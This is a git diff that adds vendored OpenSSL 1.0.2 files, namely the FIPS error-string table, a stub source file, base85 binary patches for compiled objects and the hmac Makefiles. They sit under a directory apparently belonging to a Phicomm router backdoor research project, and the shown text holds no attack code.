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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/fips_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/fips_err.h
new file mode 100644
index 0000000..0308b63
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/fips_err.h
@@ -0,0 +1,223 @@
+/* crypto/fips_err.h */
+/* ====================================================================
+ * Copyright (c) 1999-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/fips.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_FIPS,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_FIPS,0,reason)
+
+static ERR_STRING_DATA FIPS_str_functs[] = {
+    {ERR_FUNC(FIPS_F_DH_BUILTIN_GENPARAMS), "DH_BUILTIN_GENPARAMS"},
+    {ERR_FUNC(FIPS_F_DH_INIT), "DH_INIT"},
+    {ERR_FUNC(FIPS_F_DRBG_RESEED), "DRBG_RESEED"},
+    {ERR_FUNC(FIPS_F_DSA_BUILTIN_PARAMGEN), "DSA_BUILTIN_PARAMGEN"},
+    {ERR_FUNC(FIPS_F_DSA_BUILTIN_PARAMGEN2), "DSA_BUILTIN_PARAMGEN2"},
+    {ERR_FUNC(FIPS_F_DSA_DO_SIGN), "DSA_do_sign"},
+    {ERR_FUNC(FIPS_F_DSA_DO_VERIFY), "DSA_do_verify"},
+    {ERR_FUNC(FIPS_F_FIPS_CHECK_DSA), "FIPS_CHECK_DSA"},
+    {ERR_FUNC(FIPS_F_FIPS_CHECK_DSA_PRNG), "fips_check_dsa_prng"},
+    {ERR_FUNC(FIPS_F_FIPS_CHECK_EC), "FIPS_CHECK_EC"},
+    {ERR_FUNC(FIPS_F_FIPS_CHECK_EC_PRNG), "fips_check_ec_prng"},
+    {ERR_FUNC(FIPS_F_FIPS_CHECK_INCORE_FINGERPRINT),
+     "FIPS_check_incore_fingerprint"},
+    {ERR_FUNC(FIPS_F_FIPS_CHECK_RSA), "fips_check_rsa"},
+    {ERR_FUNC(FIPS_F_FIPS_CHECK_RSA_PRNG), "fips_check_rsa_prng"},
+    {ERR_FUNC(FIPS_F_FIPS_CIPHER), "FIPS_cipher"},
+    {ERR_FUNC(FIPS_F_FIPS_CIPHERINIT), "FIPS_cipherinit"},
+    {ERR_FUNC(FIPS_F_FIPS_CIPHER_CTX_CTRL), "FIPS_CIPHER_CTX_CTRL"},
+    {ERR_FUNC(FIPS_F_FIPS_DIGESTFINAL), "FIPS_digestfinal"},
+    {ERR_FUNC(FIPS_F_FIPS_DIGESTINIT), "FIPS_digestinit"},
+    {ERR_FUNC(FIPS_F_FIPS_DIGESTUPDATE), "FIPS_digestupdate"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_BYTES), "FIPS_DRBG_BYTES"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_CHECK), "FIPS_DRBG_CHECK"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_CPRNG_TEST), "FIPS_DRBG_CPRNG_TEST"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_ERROR_CHECK), "FIPS_DRBG_ERROR_CHECK"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_GENERATE), "FIPS_drbg_generate"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_INIT), "FIPS_drbg_init"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_INSTANTIATE), "FIPS_drbg_instantiate"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_NEW), "FIPS_drbg_new"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_RESEED), "FIPS_drbg_reseed"},
+    {ERR_FUNC(FIPS_F_FIPS_DRBG_SINGLE_KAT), "FIPS_DRBG_SINGLE_KAT"},
+    {ERR_FUNC(FIPS_F_FIPS_DSA_SIGN_DIGEST), "FIPS_dsa_sign_digest"},
+    {ERR_FUNC(FIPS_F_FIPS_DSA_VERIFY_DIGEST), "FIPS_dsa_verify_digest"},
+    {ERR_FUNC(FIPS_F_FIPS_GET_ENTROPY), "FIPS_GET_ENTROPY"},
+    {ERR_FUNC(FIPS_F_FIPS_MODULE_MODE_SET), "FIPS_module_mode_set"},
+    {ERR_FUNC(FIPS_F_FIPS_PKEY_SIGNATURE_TEST), "fips_pkey_signature_test"},
+    {ERR_FUNC(FIPS_F_FIPS_RAND_ADD), "FIPS_rand_add"},
+    {ERR_FUNC(FIPS_F_FIPS_RAND_BYTES), "FIPS_rand_bytes"},
+    {ERR_FUNC(FIPS_F_FIPS_RAND_PSEUDO_BYTES), "FIPS_rand_pseudo_bytes"},
+    {ERR_FUNC(FIPS_F_FIPS_RAND_SEED), "FIPS_rand_seed"},
+    {ERR_FUNC(FIPS_F_FIPS_RAND_SET_METHOD), "FIPS_rand_set_method"},
+    {ERR_FUNC(FIPS_F_FIPS_RAND_STATUS), "FIPS_rand_status"},
+    {ERR_FUNC(FIPS_F_FIPS_RSA_SIGN_DIGEST), "FIPS_rsa_sign_digest"},
+    {ERR_FUNC(FIPS_F_FIPS_RSA_VERIFY_DIGEST), "FIPS_rsa_verify_digest"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_AES), "FIPS_selftest_aes"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_AES_CCM), "FIPS_selftest_aes_ccm"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_AES_GCM), "FIPS_selftest_aes_gcm"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_AES_XTS), "FIPS_selftest_aes_xts"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_CMAC), "FIPS_selftest_cmac"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_DES), "FIPS_selftest_des"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_DSA), "FIPS_selftest_dsa"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_ECDSA), "FIPS_selftest_ecdsa"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_HMAC), "FIPS_selftest_hmac"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_SHA1), "FIPS_selftest_sha1"},
+    {ERR_FUNC(FIPS_F_FIPS_SELFTEST_X931), "FIPS_selftest_x931"},
+    {ERR_FUNC(FIPS_F_FIPS_SET_PRNG_KEY), "FIPS_SET_PRNG_KEY"},
+    {ERR_FUNC(FIPS_F_HASH_FINAL), "HASH_FINAL"},
+    {ERR_FUNC(FIPS_F_RSA_BUILTIN_KEYGEN), "RSA_BUILTIN_KEYGEN"},
+    {ERR_FUNC(FIPS_F_RSA_EAY_INIT), "RSA_EAY_INIT"},
+    {ERR_FUNC(FIPS_F_RSA_EAY_PRIVATE_DECRYPT), "RSA_EAY_PRIVATE_DECRYPT"},
+    {ERR_FUNC(FIPS_F_RSA_EAY_PRIVATE_ENCRYPT), "RSA_EAY_PRIVATE_ENCRYPT"},
+    {ERR_FUNC(FIPS_F_RSA_EAY_PUBLIC_DECRYPT), "RSA_EAY_PUBLIC_DECRYPT"},
+    {ERR_FUNC(FIPS_F_RSA_EAY_PUBLIC_ENCRYPT), "RSA_EAY_PUBLIC_ENCRYPT"},
+    {ERR_FUNC(FIPS_F_RSA_X931_GENERATE_KEY_EX), "RSA_X931_generate_key_ex"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA FIPS_str_reasons[] = {
+    {ERR_REASON(FIPS_R_ADDITIONAL_INPUT_ERROR_UNDETECTED),
+     "additional input error undetected"},
+    {ERR_REASON(FIPS_R_ADDITIONAL_INPUT_TOO_LONG),
+     "additional input too long"},
+    {ERR_REASON(FIPS_R_ALREADY_INSTANTIATED), "already instantiated"},
+    {ERR_REASON(FIPS_R_AUTHENTICATION_FAILURE), "authentication failure"},
+    {ERR_REASON(FIPS_R_CONTRADICTING_EVIDENCE), "contradicting evidence"},
+    {ERR_REASON(FIPS_R_DRBG_NOT_INITIALISED), "drbg not initialised"},
+    {ERR_REASON(FIPS_R_DRBG_STUCK), "drbg stuck"},
+    {ERR_REASON(FIPS_R_ENTROPY_ERROR_UNDETECTED), "entropy error undetected"},
+    {ERR_REASON(FIPS_R_ENTROPY_NOT_REQUESTED_FOR_RESEED),
+     "entropy not requested for reseed"},
+    {ERR_REASON(FIPS_R_ENTROPY_SOURCE_STUCK), "entropy source stuck"},
+    {ERR_REASON(FIPS_R_ERROR_INITIALISING_DRBG), "error initialising drbg"},
+    {ERR_REASON(FIPS_R_ERROR_INSTANTIATING_DRBG), "error instantiating drbg"},
+    {ERR_REASON(FIPS_R_ERROR_RETRIEVING_ADDITIONAL_INPUT),
+     "error retrieving additional input"},
+    {ERR_REASON(FIPS_R_ERROR_RETRIEVING_ENTROPY), "error retrieving entropy"},
+    {ERR_REASON(FIPS_R_ERROR_RETRIEVING_NONCE), "error retrieving nonce"},
+    {ERR_REASON(FIPS_R_FINGERPRINT_DOES_NOT_MATCH),
+     "fingerprint does not match"},
+    {ERR_REASON(FIPS_R_FINGERPRINT_DOES_NOT_MATCH_NONPIC_RELOCATED),
+     "fingerprint does not match nonpic relocated"},
+    {ERR_REASON(FIPS_R_FINGERPRINT_DOES_NOT_MATCH_SEGMENT_ALIASING),
+     "fingerprint does not match segment aliasing"},
+    {ERR_REASON(FIPS_R_FIPS_MODE_ALREADY_SET), "fips mode already set"},
+    {ERR_REASON(FIPS_R_FIPS_SELFTEST_FAILED), "fips selftest failed"},
+    {ERR_REASON(FIPS_R_FUNCTION_ERROR), "function error"},
+    {ERR_REASON(FIPS_R_GENERATE_ERROR), "generate error"},
+    {ERR_REASON(FIPS_R_GENERATE_ERROR_UNDETECTED),
+     "generate error undetected"},
+    {ERR_REASON(FIPS_R_INSTANTIATE_ERROR), "instantiate error"},
+    {ERR_REASON(FIPS_R_INSUFFICIENT_SECURITY_STRENGTH),
+     "insufficient security strength"},
+    {ERR_REASON(FIPS_R_INTERNAL_ERROR), "internal error"},
+    {ERR_REASON(FIPS_R_INVALID_KEY_LENGTH), "invalid key length"},
+    {ERR_REASON(FIPS_R_INVALID_PARAMETERS), "invalid parameters"},
+    {ERR_REASON(FIPS_R_IN_ERROR_STATE), "in error state"},
+    {ERR_REASON(FIPS_R_KEY_TOO_SHORT), "key too short"},
+    {ERR_REASON(FIPS_R_NONCE_ERROR_UNDETECTED), "nonce error undetected"},
+    {ERR_REASON(FIPS_R_NON_FIPS_METHOD), "non fips method"},
+    {ERR_REASON(FIPS_R_NOPR_TEST1_FAILURE), "nopr test1 failure"},
+    {ERR_REASON(FIPS_R_NOPR_TEST2_FAILURE), "nopr test2 failure"},
+    {ERR_REASON(FIPS_R_NOT_INSTANTIATED), "not instantiated"},
+    {ERR_REASON(FIPS_R_PAIRWISE_TEST_FAILED), "pairwise test failed"},
+    {ERR_REASON(FIPS_R_PERSONALISATION_ERROR_UNDETECTED),
+     "personalisation error undetected"},
+    {ERR_REASON(FIPS_R_PERSONALISATION_STRING_TOO_LONG),
+     "personalisation string too long"},
+    {ERR_REASON(FIPS_R_PRNG_STRENGTH_TOO_LOW), "prng strength too low"},
+    {ERR_REASON(FIPS_R_PR_TEST1_FAILURE), "pr test1 failure"},
+    {ERR_REASON(FIPS_R_PR_TEST2_FAILURE), "pr test2 failure"},
+    {ERR_REASON(FIPS_R_REQUEST_LENGTH_ERROR_UNDETECTED),
+     "request length error undetected"},
+    {ERR_REASON(FIPS_R_REQUEST_TOO_LARGE_FOR_DRBG),
+     "request too large for drbg"},
+    {ERR_REASON(FIPS_R_RESEED_COUNTER_ERROR), "reseed counter error"},
+    {ERR_REASON(FIPS_R_RESEED_ERROR), "reseed error"},
+    {ERR_REASON(FIPS_R_SELFTEST_FAILED), "selftest failed"},
+    {ERR_REASON(FIPS_R_SELFTEST_FAILURE), "selftest failure"},
+    {ERR_REASON(FIPS_R_STRENGTH_ERROR_UNDETECTED),
+     "strength error undetected"},
+    {ERR_REASON(FIPS_R_TEST_FAILURE), "test failure"},
+    {ERR_REASON(FIPS_R_UNINSTANTIATE_ERROR), "uninstantiate error"},
+    {ERR_REASON(FIPS_R_UNINSTANTIATE_ZEROISE_ERROR),
+     "uninstantiate zeroise error"},
+    {ERR_REASON(FIPS_R_UNSUPPORTED_DRBG_TYPE), "unsupported drbg type"},
+    {ERR_REASON(FIPS_R_UNSUPPORTED_PLATFORM), "unsupported platform"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_FIPS_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(FIPS_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, FIPS_str_functs);
+        ERR_load_strings(0, FIPS_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/fips_ers.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/fips_ers.c
new file mode 100644
index 0000000..1788ed2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/fips_ers.c
@@ -0,0 +1,7 @@
+#include <openssl/opensslconf.h>
+
+#ifdef OPENSSL_FIPS
+# include "fips_err.h"
+#else
+static void *dummy = &dummy;
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/fips_ers.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/fips_ers.o
new file mode 100644
index 0000000000000000000000000000000000000000..d95c30192b14cd38e5cc3c125ffcd53e3b1ac2ce
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ECm!@Bc!?(!?UMRI(Srm^?M1{(!Gj=4j31PwA-e&4(ZAr&@z}rQ
zFVLA}7ne=yp#zh*^Y*>j$)^1nTwk>u2Xr`a34fJl0lo~<FKHjvVGUr|?_aq4qp(P2
z;hyso?sdAoqAa`b#~$}i4=TFq)kfIFT*4gQjGzTDBaUJI7j%3ZzJHoDtZ`!MiQOB5
z%{h&gQ`HR&mg^)k3@56^(`zOk;#}|ufQxA&gAh^X6~5?|jNc^i$3O<aLm_}ilO%~#
z<kE?ZIbKai$RHZ4`Z+ClmQS)cm($vjix4|#qC2(U%%9WD`23|}7oWu0-_0*~>kr$%
zhmuvyMg2$UrJf$98NMnGO%m7oe2r%YXG+IrVXU=JQv+PAVA{X1ObJ|t8t7fkpnkTO
t_CJ+qrjUF(iP}~?{_|>gM_adQ&<&;2V9&pW8}{9k_Ff6^v{9k${{?k`IlBM=

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile
new file mode 100644
index 0000000..da49b3b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile
@@ -0,0 +1,108 @@
+#
+# OpenSSL/crypto/md/Makefile
+#
+
+DIR=	hmac
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=hmactest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=hmac.c hm_ameth.c hm_pmeth.c
+LIBOBJ=hmac.o hm_ameth.o hm_pmeth.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= hmac.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+hm_ameth.o: ../../e_os.h ../../include/openssl/asn1.h
+hm_ameth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+hm_ameth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+hm_ameth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+hm_ameth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hm_ameth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hm_ameth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hm_ameth.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+hm_ameth.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+hm_ameth.o: hm_ameth.c
+hm_pmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+hm_pmeth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+hm_pmeth.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+hm_pmeth.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+hm_pmeth.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+hm_pmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hm_pmeth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hm_pmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hm_pmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+hm_pmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+hm_pmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+hm_pmeth.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+hm_pmeth.o: ../cryptlib.h ../evp/evp_locl.h hm_pmeth.c
+hmac.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+hmac.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+hmac.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+hmac.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+hmac.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+hmac.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+hmac.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+hmac.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+hmac.o: ../../include/openssl/symhacks.h ../cryptlib.h hmac.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile.bak
new file mode 100644
index 0000000..da49b3b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/hmac/Makefile.bak
@@ -0,0 +1,108 @@
+#
+# OpenSSL/crypto/md/Makefile
+#
+
+DIR=	hmac
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=hmactest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=hmac.c hm_ameth.c hm_pmeth.c
+LIBOBJ=hmac.o hm_ameth.o hm_pmeth.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= hmac.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
